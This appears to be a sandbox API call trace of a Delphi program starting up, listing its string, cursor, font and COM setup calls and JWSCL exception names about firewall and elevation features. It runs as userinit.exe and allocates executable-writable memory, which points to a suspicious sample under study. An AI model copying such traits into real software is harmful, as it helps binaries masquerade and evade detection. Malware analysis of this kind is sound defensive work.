[0130.032] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0130.032] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0130.032] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0130.033] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0130.033] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0130.033] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0130.033] GetDC (hWnd=0x0) returned 0x2301087a
[0130.033] GetDeviceCaps (hdc=0x2301087a, index=90) returned 96
[0130.033] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.033] GetDC (hWnd=0x0) returned 0x2301087a
[0130.033] GetDeviceCaps (hdc=0x2301087a, index=104) returned 0
[0130.033] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.033] CreatePalette (plpal=0x6f4b4) returned 0x5a080864
[0130.033] GetStockObject (i=7) returned 0x1b00017
[0130.033] GetStockObject (i=5) returned 0x1900015
[0130.033] GetStockObject (i=13) returned 0x18a002e
[0130.033] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0130.033] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0130.033] LoadStringA (in: hInstance=0x2810000, uID=0xff3d, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0130.033] LoadStringA (in: hInstance=0x2810000, uID=0xff3c, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0130.033] LoadStringA (in: hInstance=0x2810000, uID=0xff3b, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0130.033] LoadStringA (in: hInstance=0x2810000, uID=0xff3a, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xff39, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xff38, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xff37, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xff36, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xff35, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xff34, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xff33, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xff32, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xff31, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xff30, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xff4f, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xff4e, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xff4d, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xff4c, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0130.034] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0130.034] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0130.034] GetCurrentThreadId () returned 0x860
[0130.034] GlobalAddAtomA (lpString="WndProcPtr0281000000000860") returned 0xc12c
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xfefc, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xfefb, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xfefa, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0130.034] LoadStringA (in: hInstance=0x2810000, uID=0xfef9, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xfef8, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xfef7, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xfef6, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xfef5, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xfef4, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xfef3, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xfef2, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xfef1, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xfef0, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff0f, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff0e, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff0d, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff0c, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff0b, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff0a, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff09, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff08, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff07, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff06, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff05, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff04, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff03, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff02, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff01, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff00, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff1f, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff1e, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff1d, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff1c, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff1b, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0130.035] LoadStringA (in: hInstance=0x2810000, uID=0xff1a, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0130.036] LoadStringA (in: hInstance=0x2810000, uID=0xff19, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0130.036] LoadStringA (in: hInstance=0x2810000, uID=0xff18, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0130.036] LoadStringA (in: hInstance=0x2810000, uID=0xff17, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0130.036] LoadStringA (in: hInstance=0x2810000, uID=0xff16, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0130.036] LoadStringA (in: hInstance=0x2810000, uID=0xff15, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0130.036] LoadStringA (in: hInstance=0x2810000, uID=0xff14, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0130.036] LoadStringA (in: hInstance=0x2810000, uID=0xff13, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0130.036] LoadStringA (in: hInstance=0x2810000, uID=0xff12, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0130.036] LoadStringA (in: hInstance=0x2810000, uID=0xff11, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0130.036] LoadStringA (in: hInstance=0x2810000, uID=0xff10, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0130.036] LoadStringA (in: hInstance=0x2810000, uID=0xff2f, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0130.036] LoadStringA (in: hInstance=0x2810000, uID=0xff2e, lpBuffer=0x6f4b0, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0130.036] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0130.036] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0130.036] GetVersion () returned 0x1db10106
[0130.036] GetCurrentProcessId () returned 0x854
[0130.036] GlobalAddAtomA (lpString="Delphi00000854") returned 0xc132
[0130.036] GetCurrentThreadId () returned 0x860
[0130.036] GlobalAddAtomA (lpString="ControlOfs0281000000000860") returned 0xc12b
[0130.036] RegisterClipboardFormatA (lpszFormat="ControlOfs0281000000000860") returned 0xc171
[0130.036] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0130.036] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0130.036] GetSystemMetrics (nIndex=19) returned 1
[0130.036] GetSystemMetrics (nIndex=75) returned 1
[0130.036] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2931320, fWinIni=0x0 | out: pvParam=0x2931320) returned 1
[0130.036] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0130.036] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0130.036] LoadCursorA (hInstance=0x2810000, lpCursorName=0x7ff9) returned 0x7019d
[0130.037] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0130.037] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0130.037] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0130.037] LoadCursorA (hInstance=0x2810000, lpCursorName=0x7ffa) returned 0x601c7
[0130.037] LoadCursorA (hInstance=0x2810000, lpCursorName=0x7ffb) returned 0x601c5
[0130.037] LoadCursorA (hInstance=0x2810000, lpCursorName=0x7ffc) returned 0x601c1
[0130.037] LoadCursorA (hInstance=0x2810000, lpCursorName=0x7ffd) returned 0x601bd
[0130.038] LoadCursorA (hInstance=0x2810000, lpCursorName=0x7fff) returned 0x601ab
[0130.038] LoadCursorA (hInstance=0x2810000, lpCursorName=0x7ffe) returned 0x701a7
[0130.038] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0130.038] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0130.038] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0130.038] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0130.038] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0130.038] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0130.038] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0130.038] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0130.038] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0130.038] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0130.038] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0130.038] GetDC (hWnd=0x0) returned 0x2301087a
[0130.038] GetDeviceCaps (hdc=0x2301087a, index=90) returned 96
[0130.038] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.038] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0130.038] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2869a60, dwData=0x293156c) returned 1
[0130.039] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x6f81b, fWinIni=0x0 | out: pvParam=0x6f81b) returned 1
[0130.039] CreateFontIndirectA (lplf=0x6f81b) returned 0x6b0a0820
[0130.039] GetObjectA (in: h=0x6b0a0820, c=60, pv=0x6f60c | out: pv=0x6f60c) returned 60
[0130.039] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x6f6c7, fWinIni=0x0 | out: pvParam=0x6f6c7) returned 1
[0130.039] CreateFontIndirectA (lplf=0x6f7a3) returned 0x250a089c
[0130.039] GetObjectA (in: h=0x250a089c, c=60, pv=0x6f60c | out: pv=0x6f60c) returned 60
[0130.039] CreateFontIndirectA (lplf=0x6f767) returned 0x370a0863
[0130.039] GetObjectA (in: h=0x370a0863, c=60, pv=0x6f60c | out: pv=0x6f60c) returned 60
[0130.039] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0130.039] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6f77b, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.039] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x6f77b | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0130.039] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x230000
[0130.040] GetKeyboardLayoutList (in: nBuff=64, lpList=0x6f6fc | out: lpList=0x6f6fc) returned 1
[0130.041] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0130.041] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0130.041] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6cc60000
[0130.041] GetProcAddress (hModule=0x6cc60000, lpProcName="InitializeFlatSB") returned 0x6cc9266f
[0130.041] GetProcAddress (hModule=0x6cc60000, lpProcName="UninitializeFlatSB") returned 0x6cc92542
[0130.041] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollProp") returned 0x6cc91d29
[0130.042] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollProp") returned 0x6cc9238d
[0130.042] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cc920c9
[0130.042] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cc91fdb
[0130.042] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollRange") returned 0x6cc91e8d
[0130.042] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cc91f0f
[0130.042] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollPos") returned 0x6cc91ccd
[0130.042] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollPos") returned 0x6cc9216d
[0130.042] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cc922be
[0130.042] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollRange") returned 0x6cc921e2
[0130.042] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0130.042] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0130.042] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0130.042] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0130.042] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0130.043] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0130.043] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0130.043] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0130.043] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0130.043] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0130.043] LoadStringA (in: hInstance=0x2810000, uID=0xff59, lpBuffer=0x6f45c, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0130.043] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0130.043] LoadStringA (in: hInstance=0x2810000, uID=0xff5a, lpBuffer=0x6f45c, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0130.043] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0130.043] LoadStringA (in: hInstance=0x2810000, uID=0xff5b, lpBuffer=0x6f45c, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0130.043] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0130.043] LoadStringA (in: hInstance=0x2810000, uID=0xff5c, lpBuffer=0x6f45c, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0130.043] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0130.043] SetErrorMode (uMode=0x8000) returned 0x1
[0130.043] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6cea0000
[0130.046] SetErrorMode (uMode=0x1) returned 0x8000
[0130.046] GetProcAddress (hModule=0x6cea0000, lpProcName="OleCreatePropertyFrame") returned 0x6cea20ea
[0130.046] GetProcAddress (hModule=0x6cea0000, lpProcName="OleCreateFontIndirect") returned 0x6cea20b7
[0130.046] GetProcAddress (hModule=0x6cea0000, lpProcName="OleCreatePictureIndirect") returned 0x6cea20c8
[0130.046] GetProcAddress (hModule=0x6cea0000, lpProcName="OleLoadPicture") returned 0x6cea20d9
[0130.046] SysReAllocStringLen (in: pbstr=0x28ffa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x28ffa98*="EJwsclUnsupportedException") returned 1
[0130.046] SysReAllocStringLen (in: pbstr=0x28ffa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x28ffa80*="EJwsclPIDException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ffa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x28ffa68*="EJwsclJwShellExecuteException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ffa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x28ffa50*="EJwsclShellExecuteException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ffa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x28ffa38*="EJwsclElevationException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ffa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x28ffa20*="EJwsclAbortException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ffa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x28ffa08*="EJwsclSuRunErrorException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x28ff9f0*="EJwsclElevateProcessException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x28ff9d8*="EJwsclCertApiException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x28ff9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x28ff9a8*="EJwsclInvalidStartupInfo") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x28ff990*="EJwsclFirewallNoExceptionsException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x28ff978*="EJwsclFirewallInactiveException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x28ff960*="EJwsclFirewallDelRuleException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x28ff948*="EJwsclAddUdpPortToFirewallException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x28ff930*="EJwsclAddTcpPortToFirewallException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x28ff918*="EJwsclFirewallAddRuleException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x28ff900*="EJwsclSetRemoteAdminAdressException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x28ff8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x28ff8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x28ff8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x28ff8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x28ff888*="EJwsclGetIncomingPingAllowedException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x28ff870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x28ff858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x28ff840*="EJwsclGetFWStateException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x28ff828*="EJwsclSetFWStateException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x28ff810*="EJwsclFirewallProfileInitException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x28ff7f8*="EJwsclFirewallInitException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x28ff7e0*="EJwsclGenericFirewallException") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x28ff7c8*="EJwsclEnumerateProcessFailed") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x28ff7b0*="EJwsclInvalidRegistryPath") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x28ff798*="EJwsclEndOfStream") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x28ff780*="EJwsclClassTypeMismatch") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x28ff768*="EJwsclInvalidHandle") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x28ff750*="EJwsclInvalidIndex") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x28ff738*="EJwsclInvalidSession") returned 1
[0130.047] SysReAllocStringLen (in: pbstr=0x28ff720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x28ff720*="EJwsclMissingEvent") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x28ff708*="EJwsclInvalidPointerType") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x28ff6f0*="EJwsclCreateProcessFailed") returned 1
